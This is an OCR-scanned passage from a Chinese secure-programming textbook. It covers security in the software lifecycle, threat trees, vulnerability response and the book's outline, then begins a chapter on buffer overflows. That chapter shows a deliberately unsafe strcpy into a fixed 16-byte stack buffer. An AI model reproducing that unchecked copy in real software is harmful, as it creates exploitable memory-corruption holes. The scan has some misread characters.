安装 第 三 方 提供 的 组 件 , 开 发 者 根本 无 法 知道 客户 的 软件 将 要 和 什么 组 件 交 互 , 软 件 在 
运行 的 过 程 中 出 现 安全 问题 。 

因此 ,不 管 采用 了 什么 样 的 措施 ,软件 的 安全 问题 都 无 法 完全 避免 。 即 使 在 需求 分 
析 和 设计 时 可 以 避免 (如 通过 形式 化 方法 ) .或 者 在 开发 时 可 以 避免 (比如 通过 全 面 的 代 
码 审 查 和 大 量 的 测试 ) ,但 缺陷 还 是 会 在 软件 汇编 .集成 .部 署 和 运行 时 候 被 引入 。 不 管 
如 何 忠实 地 遵守 一 个 基于 安全 的 开发 过 程 ,只 要 软件 的 规模 和 复杂 性 继续 增长 ,一 些 可 
被 挖掘 出 来 的 错误 和 其 他 缺陷 是 肯定 存在 的 。 人 们 所 能 做 的 工作 就 是 尽量 让 安全 问题 
变 少 ,而 不 能 完全 消灭 安全 问题 。 因 此 ,本 书 所 叙述 的 “安全 编程 技术 ", 不 是 为 了 消除 
安全 隐患 ,而 是 为 了 尽量 减少 安全 隐患 。 


Note 
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1.2 在 软件 开发 生命 周期 中 考虑 安全 问题 


软件 开发 生命 周期 可 以 有 很 多 模型 ,如 瀑布 模型 .原型 模型 等 。 但 是 一 般 说 来 , 软 


| 件 开 发 生命 周期 可 以 包括 以 下 5 个 阶段 中。 


(1) 分 析 阶 段 。 软 件 需求 分 析 ,实际 上 是 回答 "软件 需要 完成 什么 功能 ”。 它 的 主 


要 工作 是 ,通过 研讨 或 调查 研究 ,对 用 户 的 需求 进行 收集 ,然后 去 粗 取 精 、 去 伪 存 真 、 正 
， 确 理解 ,最 后 把 它 用 标准 的 软件 工程 开发 语言 (需求 规格 说 明 书 ) 表 达 出 来 , 供 设计 人 员 


参考 。 
该 阶段 首先 是 在 用 户 中 进行 调查 研究 ,和 用 户 一 起 确定 软件 需要 解决 的 问题 ,此 阶 


。 段 的 重要 工作 有 


。 建立 软件 的 逻辑 模型 ; 

。 编写 需求 规格 说 明 书 文档 ,根据 用 户 需求 ,通过 不 断 沟通 ,反复 修改 ,并 最 终 得 
到 用 户 的 认可 。 

(2) 设计 阶段 。 一 般 说 来 ,软件 设计 可 以 分 为 概要 设计 和 详细 设计 两 个 阶段 。 该 


”阶段 的 最 终 任务 是 将 软件 分 解 成 一 个 个 模块 (可 以 是 一 个 函数 ,过程 子 程序 ,一段 带 有 
| 程序 说 明 的 独立 的 程序 和 数据 ,也 可 以 是 可 组 合 、 可 分 解 和 可 更 换 的 功能 单元 ) ,并 将 模 
” 块 内 部 的 结构 设计 出 来 。 


该 阶段 的 主要 工作 有 : 

利用 结构 化 分 析 方 法 、 数 据 流 程 图 和 数据 字典 等 方法 ,根据 需求 说 明 书 的 要 求 ， 
设计 建立 相应 的 软件 系统 的 体系 结构 ; 

进行 模块 设计 ,给 出 软件 的 模块 结构 ,用 软件 结构 图 表示 ,将 整个 系统 分 解 成 若 
干 个 子 系统 或 模块 ,定义 子 系统 或 模块 间 的 接口 关系 ; 

设计 模块 的 程序 流程 ,算法 和 数据 结构 ,设计 数据 库 ; 

编写 软件 概要 设计 和 详细 设计 说 明 书 ,数据 库 或 数据 结构 设计 说 明 书 ,编制 测 
试 计划 。 

(3) 编码 阶段 。 该 阶段 主要 把 软件 设计 转换 成 计算 机 可 以 接受 的 程序 ,选择 某 一 


。 种 程序 设计 语言 ,编写 出 源 程序 清单 。 


此 阶段 的 主要 工作 有 : 
。 基于 软件 产品 的 开发 质量 的 要 求 , 充 分 了 解 软件 开发 语言 .工具 的 特性 和 编程 
风格 ; 
。 进行 编码 ; 
。 提供 源 程序 清单 。 
(4) 测试 阶段 。 软 件 测试 的 目的 是 以 较 小 的 代价 发 现 尽 可 能 多 的 错误 。 要 实现 该 
目标 ,关键 在 于 设计 一 套 出 色 的 测试 用 例 。 不 同 的 测试 方法 有 不 同 的 测试 用 例 设计 方 


”法 ,目前 常见 的 测试 方法 有 ; 


。 和 白 盒 测 试 法 。 该 测试 法 的 对 象 是 源 程序 ,依据 的 是 程序 内 部 的 逻辑 结构 来 发 现 
软件 的 编程 错误 、 结 构 错 误 和 数据 错误 (如 逻辑 ` 数 据 流 、 初 始 化 等 错误 ) ,其 用 
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例 设计 的 关键 ,是 以 较 少 的 用 例 履 盖 尽 可 能 多 的 内 部 程序 逻辑 结构 。 
。 黑 盒 测 试 法 。 依 据 的 是 软件 的 功能 或 软件 行为 描述 ,发 现 软件 的 接口 功能 和 
结构 错误 。 黑 盒 法 用 例 设计 的 关键 同样 也 是 以 较 少 的 用 例 覆 盖 模 块 输出 和 输 
人 接口 。 
此 阶段 的 主要 工作 是 
。 设 计 测试 用 例 ,进行 测试 ， 
。 写 出 测试 报告 ,提交 修改 部 门 
。 继续 测 试 。 
(5) 维护 阶段 。 本 阶段 主要 根据 软件 运行 的 情况 ,对 软件 进行 适当 修改 ,以 适应 新 
的 要 求 ; 以 及 纠正 运行 中 发 现 的 错误 。 本 阶段 工作 在 已 完成 对 软件 的 研制 (分 析 、 设 
计 、 编 码 和 测试 ) 工 作 并 交付 使 用 以 后 进行 ,一 般 所 做 的 工作 是 编写 软件 问题 报告 .软件 
修改 报告 。 
维护 阶段 的 成 本 是 比较 高 的 ,设计 不 到 位 或 者 编码 测试 考虑 不 周全 ,可 能 会 造成 软 
件 维护 成 本 的 大 幅度 提高 。 以 一 个 中 小 规模 软件 为 例 ,如 果 设 计 、 编 码 和 测试 需要 一 年 
的 时 间 , 在 投入 使 用 后 ,其 运行 时 间 可 能 持续 三 年 。 那 么 维护 阶段 也 就 要 持续 三 年 。 这 
段 时 间 内 ,软件 的 维护 者 除了 要 解决 研制 阶段 所 遇 到 的 各 种 问题 ,如 排除 障碍 外 ,还 要 
扩展 软件 的 功能 ,提高 性 能 。 所 以 ,事实 上 ,和 软件 开发 工作 相 比 ,软件 维护 的 工作 量 和 
成 本 都 要 大 得 多 。 
在 实际 开发 过 程 中 ,软件 开发 并 不 一 定 是 从 第 一 步 进行 到 最 后 一 步 ,而 是 在 任何 阶 
段 ,在 进入 下 一 阶段 前 一 般 都 有 一 步 或 几 步 的 回潮 。 如 在 测试 过 程 中 发 现 问题 可 能 要 
求 修改 设计 ,用 户 可 能 会 提出 一 些 需要 来 修改 需求 说 明 书 等 。 
以 下 主要 基于 安全 问题 ,针对 软件 工程 中 的 各 个 阶段 进行 阐述 。 


1.2.1 软件 设计 阶段 威胁 建 模 


软件 在 设计 阶段 达到 的 安全 性 能 ,将 是 软件 整个 生命 周期 的 基础 。 如 果 在 设计 阶 
段 没 有 考虑 某 些 安全 问题 ,那么 在 编码 时 就 几乎 不 被 考虑 。 这 些 隐患 将 可 能 成 为 致命 | 
的 缺陷 ,在 后 期 以 更 高 的 代价 的 形式 爆发 出 来 。 所 以 ,安全 问题 ,应 该 从 设计 阶段 就 开 ， 
始 考虑 ,设计 要 尽 可 能 完善 。 

传统 的 软件 设计 过 程 中 ,将 工作 的 重点 一 般 放 在 软件 功能 的 设计 上 ,没有 非常 详细 
地 考虑 到 安全 问题 。 因 此 ,在 软件 设计 阶段 ,针对 安全 问题 ,应 该 明确 以 下 方面 : 

。 安 全 方面 有 哪些 目标 需要 达到 |; 

。 软件 可 能 遇 到 的 攻击 和 安全 隐患 ,等 等 。 | 

该 阶段 ,一 般 采 用 威胁 建 模 的 方法 在 软件 设计 阶段 加 入 安全 因素 的 考量 。 威 胁 建 | 
模 除了 和 设计 阶段 的 其 他 建 模 工作 类 似 的 地 方 外 ,更 加 关心 安全 问题 ,是 一 种 比较 好 的 | 
安全 问题 的 表达 方法 。 


如 前 所 述 ,分 析 系统 中 可 能 存在 的 威胁 ,可 能 是 一 件 比较 繁重 的 工作 ,因为 很 多 威 ， 


胁 是 不 可 预见 的 。 但 是 ,在 设计 阶段 就 尽 可 能 多 地 将 威胁 考虑 到 ,在 编写 代码 前 修改 方 
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案 ,代价 比较 小 。 威 胁 建 模 过 程 一 般 如 下 外， 

(1) 在 项 目 组 中 成 立 一 个 安全 小 组 。 在 此 过 程 中 ,需要 从 项 目 组 内 挑选 对 安全 问 
题 比 较 了 解 的 人 ,这 些 人 可 能 不 一 定 要 人 慌 得 怎样 去 编写 程序 ,但 是 要 懂得 程序 运行 的 过 
程 中 ,可 能 会 出 现 哪些 安全 问题 ,或 者 可 能 受到 什么 样 的 攻击 。 也 可 以 请 用 户 中 的 某 些 
人 来 参与 该 小 组 。 

(2) 分 解 系统 需求 。 本 过 程 中 ,可 按照 需求 规格 说 明 书 和 设计 文档 中 的 内 容 ,站 在 
安全 角度 ,分 析 系统 在 安全 方面 的 需求 。 当 然 ,传统 的 软件 工程 中 的 一 些 工 具 也 可 以 使 


R 


。 用 ,如 数据 流 图 (DFD) .统一 建 模 语言 (UML) 等。 关于 这 些 内 容 ,大 家 可 以 参考 相应 


”措施 。 


文献 。 

(3) 确定 系统 可 能 面临 哪些 威胁 。 系 统 可 能 遇 到 的 威胁 有 很 多 种 ,在 这 里 可 以 首 
先 将 威胁 进行 分 类 ,如 系统 缓冲 区 溢出 、 身 份 欺骗 . 复 改 数据 ,抵赖 .信息 泄露 .拒绝 服 
务 特权 提升 等 。 由 于 同类 的 安全 问题 可 以 用 类 似 的 方法 解决 ,因此 该 过 程 可 以 减 小 后 
期 工作 量 。 

另外 ,对 威胁 进行 分 类 之 后 ,可 以 画 出 威胁 树 , 其 目的 是 对 软件 可 能 受到 的 威胁 进 
行 表 达 。 图 1-3 是 一 个 针对 用 户口 令 安全 问题 画 出 的 威胁 树 。 


获取 用 户口 令 


通过 监听 获取 从 服务 器 证 书 | | ”从 本 地 获取 


| < 国 感染 病毒 恶意 管理 员 | 


图 1-3 
图 中 画 出 了 威胁 用 户口 令 安全 的 各 种 原因 ,可 以 针对 不 同 的 原因 采用 相应 的 


(4) 选择 应 付 威胁 或 者 缓和 威胁 的 方法 。 很 显然 ,针对 不 同 的 安全 问题 ,可 以 选择 
应 付 威胁 或 者 缓和 威胁 的 方法 。 一 般 说 来 ,可 以 应 付 或 缓和 威胁 的 方法 有 很 多 ,但 是 考 
虑 到 实施 的 成 本 ,根据 威胁 可 能 的 危害 程度 ,还 是 要 有 所 选择 。 在 面 对 威 胁 时 ,可 以 采 
用 的 方法 有 : 

。 不 进行 任何 处 理 。 这 是 不 建议 的 方法 。 

。 告知 用 户 。 如 果 某 些 威胁 无 法 在 产品 上 施加 某 种 技术 来 解决 ,可 以 告知 用 户 。 
如 提醒 用 户 要 杀毒 等 。 
排除 问题 。 在 软件 中 施加 某 种 技术 来 避免 出 现 安全 问题 。 
修补 问题 。 某 些 问题 如 果 无 法 预见 和 解决 ,可 以 提供 修补 接口 , 待 出 现 问题 之 
后 进行 扩展 。 不 过 这 种 方案 的 代价 是 比较 大 的 ,对 软件 的 设计 提出 了 较 高 的 
要 求 。 
(5) 确定 最 终 技 术 。 在 各 种 备 选 的 方案 中 ,确定 最 终 选 用 的 技术 。 一 般 可 以 将 最 


终 选 用 的 技术 ,直接 在 威胁 树 中 描述 或 者 用 图 表 画 出 来 。 如 图 1-4 所 示 的 就 是 针对 用 


户口 令 安全 的 威胁 树 进行 的 修改 。 
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获取 用 户口 令 


通过 监听 获取 从 服务 器 证 书 从 本 地 获取 


ss 


设置 感染 病毒 恶意 管理 员 
权限 


1.2.2 安全 代码 的 编写 


实际 上 ,在 设计 阶段 如 果 尽 可 能 多 地 将 问题 考虑 周到 ,在 软件 的 代码 编写 阶段 ,只 

是 针对 这 些 问 题 进行 实现 而 已 。 不 过 ,在 编码 过 程 中 也 需要 考虑 一 些 技巧 。 如 : 
。 内 存 安全 怎样 实现 ? 

怎样 保证 线程 安全 ? 

如 何 科 学 地 处 理 异 常 ? 

输入 输出 安全 怎样 保障 ? 

怎样 做 权限 控制 ? 

怎样 保护 数据 ? 

怎样 对 付 算 改 和 抵赖 ? 

怎样 编写 优化 的 代码 ? 

等 等 。 而 这 些 内 容 正 是 本 书 讨论 的 话题 。 


1.2.3 软件 的 安全 性 测试 


测试 是 软件 发 布 前 所 做 的 重要 工作 ,一 方面 ,需要 对 软件 的 可 用 性 进行 评测 , 另 一 
方面 ,也 要 对 软件 的 安全 性 进行 最 大 限度 的 保障 。 所 以 ,测试 工作 决定 着 软件 的 质量 ， 
是 软件 质量 保证 的 关键 手段 。 

在 充分 考虑 安全 性 问题 的 前 提 下 ,安全 性 测试 显得 尤为 重要 。 安 全 测试 和 普通 的 
功能 性 测试 主要 目的 不 同 。 普 通 的 功能 测试 的 主要 目的 是 : 

。 确保 软件 不 会 去 完成 没有 预先 设计 的 功能 ; 

。 确 保 软件 能 够 完成 预先 设计 的 功能 。 

而 安全 测试 是 安全 的 软件 生命 周期 中 一 个 重要 的 环节 。 实 际 上 ,安全 测试 就 是 一 
轮 多 角度 .全 方位 的 攻击 和 反攻 击 。 因 此 ,进行 安全 测试 ,需要 精湛 的 系统 分 析 技术 和 
反攻 击 技术 ,其 目的 就 是 要 抢 在 攻击 者 之 前 尽 可 能 多 地 找到 软件 中 的 漏洞 ,以 减少 软件 
遭 到 攻击 的 可 能 性 。 因 此 ,安全 测试 有 如 下 特点 : | 

。 非常 灵活 ,测试 用 例 没 有 太 多 的 预见 性 ; 

。 没有 固定 的 步骤 可 以 遵循 ; 
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。 工作 量 大 ,并 且 不 能 保证 完全 地 加 以 解决 。 
1.2.4 ”漏洞 响应 和 产品 的 维护 外 


在 软件 开发 的 过 程 中 ,即使 在 设计 ,代码 编写 和 测试 过 程 中 考虑 了 安全 因素 ,最 终 
的 软件 产品 仍 可 能 存在 漏洞 。 漏 洞 一 般 在 用 户 使 用 的 过 程 中 被 发 现 ,此 时 ,迅速 确认 、 
响应 ,修复 漏洞 ,是 非常 重要 的 。 

由 于 软件 的 维护 是 一 个 长 期 的 过 程 ,因此 ,软件 的 维护 和 跟踪 要 及 时 ,持续 ,也 要 花 
费 较 大 的 成 本 。 大 型 软件 公司 都 会 有 自己 的 安全 响应 队伍 ,专职 处 理 安全 事件 ,在 发 现 


漏洞 后 的 第 一 时 间 采 取 措 施 , 以 保护 客户 的 利益 不 被 侵害 。 


一 般 来 说 ,正常 的 漏洞 响应 可 以 大 致 分 为 以 下 4 个 阶段 : 
(1) 发 现 漏洞 通知 厂商 。 在 该 阶段 ,漏洞 首先 由 用 户 报告 给 厂商 所 设置 的 安全 响 


应 中 心 , 响 应 中 心经 过 初步 的 鉴定 ,如 果 确 信 是 一 个 漏洞 ,安全 响应 队伍 向 漏洞 上 报 者 
确认 已 经 收 到 漏洞 报告 。 


(2) 确认 漏洞 和 风险 评估 。 安 全 响应 队伍 会 联系 上 报 者 和 相关 产品 的 开发 部 门 ， 
以 获得 更 多 的 技术 细节 ,有 时 甚至 会 将 上 报 者 和 开发 团队 召集 在 一 起 进行 讨论 。 当 泪 
洞 被 成 功 重 现 后 ,为 漏洞 定 一 个 威胁 等 级 。 

(3) 修复 漏洞 。 安 全 响应 队伍 和 开发 队伍 协商 决定 解决 方案 ,并 确定 响应 工作 的 
时 间 表 。 开 发 部 门 开始 修复 漏洞 ,补丁 完成 后 ,进行 严格 的 测试 。 

(4) 发 布 补丁 及 安全 简报 ,对 外 公布 安全 补丁 。 通 知 所 有 用 户 修补 该 漏洞 ,在 网 站 
上 发 布 安全 简报 。 


1.3 本 书 的 内 容 


1.3.1 编程 中 的 安全 
如 前 所 述 , 想 要 让 软件 的 缺陷 尽量 少 ,并 且 在 其 运行 期 间 可 以 预测 其 所 有 的 安全 隐 


患 ,是 非常 困难 的 事 ; 另 一 方面 ,如 果 要 完全 消除 安全 隐患 ,也 是 不 可 能 的 。 传 统 的 软 


包括， 


件 开发 组 织 常常 把 软件 的 功能 ,任务 时 间 表 和 开发 成 本 放 在 关注 的 首位 ,而 把 软件 的 安 
全 和 质量 放 在 其 次 ,这 在 现代 软件 工程 中 ,已 经 无 法 适应 需求 。 因 此 ,在 编码 过 程 中 , 必 
须 考虑 很 多 安全 性 问题 。 

健全 的 编码 可 以 大 大 减少 软件 实现 期 间 引 入 的 漏洞 ,本 书 针 对 编码 过 程 中 的 一 些 
安全 技巧 进行 讲解 。 主 要 针对 如 下 问题 进行 阐述 。 
(1) 基本 安全 编程 。 主 要 是 针对 编程 过 程 中 最 常见 、 最 基本 的 安全 问题 进行 讲解 。 


。 内存 安全 。 主 要 包括 编程 过 程 中 内 存 数据 出 现 的 常见 安全 问题 ,如 缓冲 区 洲 
出 整数 溢出 ,字符 串 格式 化 等 。 

。 线程 /进程 安全 。 线 程 在 软件 开发 过 程 中 运用 很 广 , 但 是 不 恰当 的 线程 操作 可 
能 会 造成 安全 隐患 ,该 话题 主要 讲解 线程 安全 问题 ,如 线程 同步 线程 死 锁 等 。 
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。 异常 /错误 处 理 中 的 安全 。 异 常 是 程序 设计 中 必须 处 理 的 ,本 话题 主要 讨论 怎 
样 处 理 异 常 能 够 保证 系统 的 安全 性 。 

。 输 入 输出 安全 。 不 恰当 的 输入 可 能 给 系统 带 来 隐患 ,在 此 主要 介绍 对 输入 的 合 
法 性 进行 检测 等 内 容 。 


(2) 应 用 安全 编程 。 主 要 是 针对 常见 的 某 些 特定 应 用 中 出 现 的 安全 问题 进行 讲 ， 


解 。 包 括 : 
。 数 据 库 安 全 。 数 据 库 是 大 量 软 件 中 必然 使 用 的 系统 ,针对 数据 库 安全 的 讲解 主 

要 包括 数据 库存 储 和 访问 上 的 安全 。 

国际 化 安全 。 软 件 的 国际 化 很 重要 ,但 是 国际 化 过 程 中 的 编码 问题 ,有 时 会 造 

成 安全 隐患 ,因此 ,本 话题 主要 讲解 国际 化 过 程 ,以 及 解决 国际 化 过 程 中 的 缓冲 

区 溢出 问题 。 

面向 对 象 中 的 编程 安全 。 目 前 ,大 部 分 软件 项 目 都 使 用 面向 对 象 的 方法 进行 纺 

写 ,本 话题 主要 解决 面向 对 象 编程 中 内 存 分 配 和 数据 安全 ,以 及 介绍 一 些 面 向 

对 象 的 技巧 来 提高 系统 性 能 的 方法 。 

权限 控制 。 很 多 系统 中 都 会 涉及 授权 和 限制 访问 ,权限 控制 是 解决 资源 访问 安 ， 

全 性 的 重要 途径 ,本 话题 主要 站 在 编程 人 员 的 角度 ,讲述 怎样 用 编码 方式 实现 

较 好 的 权限 控制 。 

Web 编程 安全 。Web 是 一 种 比较 流行 的 编程 方式 , Web 编程 中 安全 问题 多 种 

多 样 ,这 里 主要 解决 网 络 编程 中 如 跨 站 脚本 、SQL 注入 、Web 认证 攻击 URL 

操作 攻击 等 安全 问题 。 

远程 调用 和 组 件 安全 。 远 程 调用 和 组 件 是 某 些 项 目 中 的 关键 技术 ,也 是 某 些 编 

程 体系 结构 中 的 亮点 ,本 话题 主要 解决 RPC、DCOM、EJB 等 组 件 在 开发 过 程 中 

遇 到 的 安全 问题 。 

避免 拒绝 服务 攻击 。 拒 绝 服务 攻击 是 一 种 比较 古老 的 攻击 ,出现 得 比较 频繁 ， 

危害 也 比较 大 。 该 部 分 主要 讲述 拒绝 服务 攻击 的 原理 以 及 解决 方法 。 


1.3.2 针对 信息 安全 的 编程 


针对 信息 安全 的 编程 主要 集中 在 以 下 几 个 方面 ,本 书 也 将 进行 讲解 。 

(GD 加 密 解密 。 在 信息 时 代 , 数 据 的 安全 越 来 越 受 到 了 关注 。 对 于 保存 在 计算 机 
上 的 某 些 数据 ,我 们 希望 其 信息 不 被 人 所 知 ; 对 于 在 网 络 上 传输 的 重要 数据 ,我 们 希望 
即使 被 敌 方 窃听 之 后 也 不 会 泄密 。 此 时 ,将 信息 进行 加 密 ,就 成 了 保障 数据 安全 的 首要 
方法 。 该 内 容 主要 介绍 常见 的 加 密 解密 算法 的 实现 。 

(2) 数据 的 其 他 保护 。 由 于 数据 加 密 算法 所 需要 占用 的 资源 和 加 密 解密 算法 本 身 
的 复杂 度 , 讶 目 将 数据 通过 加 密 来 进行 保护 ,有 可 能 会 降低 系统 的 运行 速度 。 因 此 ,不 
用 加 密 方法 来 进行 的 数据 保护 ,也 具有 和 较 好 的 应 用 背景 。 本 书 针对 一 些 特定 的 数据 保 | 
护 场合 进行 介绍 。 

(3) 数字 签名 。 加 密 保护 实际 上 防止 的 是 被 动 攻击 。 在 这 种 攻击 模式 下 ,攻击 者 
并 不 干预 通信 流量 ,只 是 尝试 从 中 提取 有 用 的 信息 。 实 际 上 ,网 络 上 的 安全 问题 不 仅仅 | 
只 限于 被 动 攻 击 , 大 量 的 主动 攻击 也 是 网 络 安 全 上 需要 考虑 的 重要 问题 。 除 了 加 密 解 
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密 外 ,还 需要 对 信息 来 源 的 鉴别 、 对 信息 的 完整 和 不 可 否认 等 功能 进行 保障 ,而 这 些 功 能 
通常 都 是 可 以 通过 数字 签名 实现 。 本 书 对 数字 签名 的 原理 、 实 现 方法 进行 了 详细 叙述 。 


1.3.3 其 他 内 容 


针对 软件 安全 中 的 其 他 几 个 问题 ,本 书 也 将 进行 讲解 。 包 括 : 

(1) 软件 的 安全 测试 。 虽 然 安全 测试 和 安全 编程 属于 两 个 不 同 的 领域 ,但 是 同样 
是 软件 安全 的 重要 保障 。 本 章 主 要 针对 测试 阶段 的 安全 问题 进行 讲解 。 

(2) 代码 性 能 调 优 。 代 码 性 能 的 好 坏 有 时 候 也 关系 到 系统 的 安全 。 因 此 ,在 本 书 
中 也 对 代码 性 能 调 优 进 行 了 讲解 。 


小 结 


本 章 对 安全 编程 技术 进行 了 概述 。 首 先 讲解 了 软件 安全 问题 出 现 的 原因 ; 然后 阐 


述 了 软件 安全 问题 的 一 些 表 现 ; 站 在 软件 开发 者 的 角度 ,对 安全 问题 进行 分 类 ; 接 下 


来 对 软件 工程 中 的 安全 问题 进行 详细 的 讲解 ,提出 一 些 措 施 以 便 在 软件 工程 的 各 个 阶 


段 考虑 安全 问题 。 最 后 并 介绍 了 本 书 的 内 容 。 


练 习 


1. 软件 安全 问题 的 出 现 ,直接 的 感受 者 一 般 是 用 户 。 

(1) 站 在 用 户 的 角度 , 举 出 两 个 因为 编程 安全 问题 被 忽略 而 造成 隐患 的 例子 。 

(2) 站 在 程序 员 角 度 , 分 析 其 原因 。 

2. 软件 测试 由 于 无 法 实现 穷 举 测试 ,无 法 发 现 软件 中 的 全 部 错误 。 

(1) 任 举 一 个 软件 输入 的 例子 ,计算 其 穷 举 测试 的 代价 。 

(2) 怎样 用 尽量 少 的 用 例 发 现 尽量 多 的 问题 ? 

3. 有 一 个 Web 站 点 ,其 数据 库 可 能 被 攻击 者 攻击 ,请 画 出 相关 威胁 树 , 并 加 上 相 
应 的 解决 方法 。 

4. 一 个 软件 ,在 开发 阶段 运行 没有 问题 ,但 是 在 运行 很 长 一 段 时 间 之 后 出 现 问题 ， 


。 有 这 样 的 情况 吗 ? 请 你 列举 一 个 例子 ,并 说 明 可 能 的 原因 。 


5. 如 果 你 是 项 目 经 理 , 怎 样 在 测试 和 产品 交付 之 间 找 到 平衡 ? 
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内 存 安 全 


内 存 安 全 ,关系 到 整个 程序 的 安全 ,在 软件 开发 和 程序 设计 中 具有 重要 地 位 。 如 果 
程序 员 稍 微 疏 忽 , 很 容易 出 现 安全 隐患 ,而 这 些 安全 问题 又 具有 不 间断 发 生 , 难 以 调试 
等 特点 。 因 此 ,内 存 安全 和 系统 的 安全 息息相关 。 

内 存 数 据 涵 盖 了 很 多 方面 ,如 字符 串 、 数 组 .整数 都 在 内 存 中 以 不 同 的 形式 存在 , 它 
们 在 被 操作 的 过 程 中 ,具有 哪些 特点 ? 什么 样 的 操作 能 够 产生 攻击 ? 这 些 都 是 程序 员 
编程 时 需要 重视 的 问题 。 

首先 是 缓冲 区 溢出 问题 。 该 问题 在 字符 串 拷贝 或 其 他 函数 使 用 时 很 容易 出 现 ,处 
理 不 当 , 会 给 程序 留 下 安全 漏洞 ,成 为 攻击 的 目标 ; 其 次 是 整数 溢出 问题 ,整数 由 于 其 
保存 的 特殊 性 , 某 些 特殊 的 计算 可 能 导致 令 人 奇怪 的 结果 ,如 果 处 理 不 当 , 照 样 会 成 为 
隐患 ; 另外 ,数组 越界 问题 .字符 串 格 式 化 问题 .都 是 需要 重点 考虑 的 问题 。 

本 章 主要 基于 C 语言 ,针对 缓冲 区 溢出 、 整 数 溢出 、 数 组 越界 、 字 符 串 格 式 化 等 内 
存 安全 问题 进行 详细 阐述 ,讲解 内 存 安全 的 本 质问 题 。 不 过 本 章 也 只 是 站 在 数据 操作 
的 角度 来 讲 内 存 安全 ,后 面 章节 中 的 一 些 安全 问题 也 会 和 内 存 有 关 。 


2.1 缓冲 区 溢出 


2.1.1 缓冲 区 


在 程序 设计 过 程 中 ,很 多 场合 下 都 用 到 缓冲 区 的 概念 。 缓 冲 区 保存 于 内 存 中 ,简单 说 
来 是 一 块 连续 的 计算 机 内 存 区 域 ,可 以 保存 相同 数据 类 型 的 多 个 实例 。 举 例 说 明 如 下 : 


void function(char * input) 
{ 
char buffer[16]; 
strcpy(buffer, input); 
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。 溢出 ,里 面 牵涉 到 的 字符 数组 也 是 动态 的 。 
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这 是 一 个 C 语言 编写 的 函数 ,函数 strcpy() 具 有 一 个 输入 参数 input, 该 函数 的 功 
能 是 将 input 中 的 内 容 copy 到 buffer 中 。 在 该 代码 中 ,buffer 数组 可 以 保存 多 个 字符 
(数据 类 型 相同 ) ,可 以 称 为 是 缓冲 区 。 

为 了 方便 起 见 , 缓 冲 区 溢出 问题 ,通常 利用 C 语言 进行 讲解 。 实 际 上 ,在 C 中 ,由 
于 字符 数组 中 字符 个 数 的 不 确定 ,最 常见 产生 缓冲 区 问题 的 场合 就 是 对 字符 数组 的 
操作 。 

字符 数组 ,与 C 语 言 中 所 有 变量 一 样 ,可 以 被 声明 为 静态 或 动态 ,静态 数组 在 程序 
加 载 时 定位 于 数据 段 ,动态 数组 在 程序 运行 时 定位 于 堆栈 之 中 。 

本 章 讲解 的 缓冲 区 溢出 问题 ,主要 是 针对 动态 缓冲 区 溢出 问题 , 即 基 于 堆栈 缓冲 区 
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堆栈 缓冲 区 是 进程 在 内 存 中 运行 时 分 配 的 一 部 分 区 域 。 实 
动态 存储 区 (堆栈 ) | 际 上 ,进程 在 内 存 中 运行 时 ,被 分 成 3 个 区 域 : 程序 代码 区 、 静 
静态 存储 区 态 存储 区 动态 存 储 区 (堆栈 ) ,如 图 2-1 所 示 。 

程序 代码 区 其 中 ,程序 代码 区 是 由 程序 确定 的 ,主要 包括 只 读数 据 和 代 
码 ( 指 令 )。 在 可 执行 文件 中 ,该 区 域 相当 于 文本 段 。 一 般 情况 
下 ,程序 确定 了 ,这 部 分 内 容 也 就 确定 。 程 序 代码 区 中 的 内 容 通 

常 是 只 读 的 ,无 法 对 其 内 容 进行 修改 ,任何 对 其 写 入 操作 都 会 导致 段 错误 。 
其 次 ,静态 存储 区 包含 已 初始 化 和 未 初始 化 的 数据 ,但 里 面 的 数据 都 是 静态 的 ,如 


图 2-1 


静态 变量 就 存储 在 这 个 区 域 中 。 实 际 上 ,该 区 域 是 在 编译 时 分 配 存 储 单元 ,程序 结束 时 


才 回 收 。 
动态 存储 区 (堆栈 区 ) 中 的 变量 是 在 程序 运行 期 间 ,根据 程序 需要 ,随时 动态 分 配 存 


储 空间 ,如 局 部 变量 所 占据 的 空间 就 属于 该 区 域内 ,该 区 域 最 容易 发 生 缓冲 区 游 出 ,是 


本 童 研究 的 重点 。 


提示 ”堆栈 是 一 个 常见 的 抽象 数据 类 型 。 堆 栈 中 的 数据 具有 一 个 特性 ; 最 后 一 
个 放 入 堆栈 中 的 数据 ,总 是 被 最 先 拿 出 来 (后 进 先 出 ,LIFO)。 在 堆栈 中 通常 有 一 个 指 


。 针 指向 栈 顶 , 堆 栈 中 的 两 个 最 重要 的 运算 是 ， 


(1) PUSH 在 堆栈 的 顶部 加 入 一 个 元 素 , 栈 顶 上 移 ; 

(2) POP 在 堆栈 项 部 移 去 一 个 元 素 ,并 将 堆栈 的 大 小 减 一 , 栈 顶 下 移 。 

堆栈 的 结构 和 相关 操作 在 (算法 和 数据 结构 ) 中 有 上 比较 详细 的 讲解 ,有 兴趣 的 读者 
可 以 参考 相关 文献 。 

堆栈 和 程序 设计 有 非常 紧密 的 关系 。 举 一 个 例子 来 说 ,在 使 用 高 级 语言 构造 程序 
时 ,不 可 避免 地 遇 到 过 程 (procedure) 或 函数 (function) 的 调用 。 一 个 函数 调用 另 一 个 
函数 时 ,可 以 跳 转 去 运行 男 一 个 函数 ,从 某 种 程度 上 讲 , 相 当 于 改变 了 程序 的 控制 流程 ; 


但 这 又 不 是 完全 的 跳 转 ,因为 当 工 作 完成 时 必须 返回 ,函数 把 控制 权 返 回 给 调用 之 后 的 
。 语句 或 指令 ,所 以 跳 转 前 必须 保存 现场。 


当 函 数 调用 嵌 套 较 多 时 ,数据 现场 的 保存 就 相当 复杂 ,因为 A 函数 调用 B 函数 , 需 


要 保存 A 函数 的 现场 ,B 函数 中 又 调用 C 函数 ,此 时 又 要 保存 B 函数 的 现场 ,调用 完 
， 毕 , 先 恢复 B 函数 的 现场 ,再 恢复 A 函数 的 现场 ,并 且 A、B、C 中 还 有 可 能 具有 相同 名 
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字 的 局 部 变量 。 如 果 不 采 用 科学 的 方法 ,数据 就 会 乱 套 。 岩 套 函 数 调用 这 种 高 级 抽象 
实现 起 来 通常 可 以 靠 堆栈 的 帮助 ,堆栈 也 用 于 给 函数 中 使 用 的 局 部 变量 动态 分 配 空 间 ， 
给 函数 传递 参数 和 函数 返回 值 时 也 要 用 到 堆栈 中。 

从 程序 设计 底层 来 讲 , 堆 栈 是 内 存 中 一 块 保存 数据 的 连续 空间 , 它 的 使 用 主要 有 如 
下 特点 : 

。 一 个 名 为 堆栈 指针 (SP) 的 寄存 器 指向 堆栈 顶部 ; 

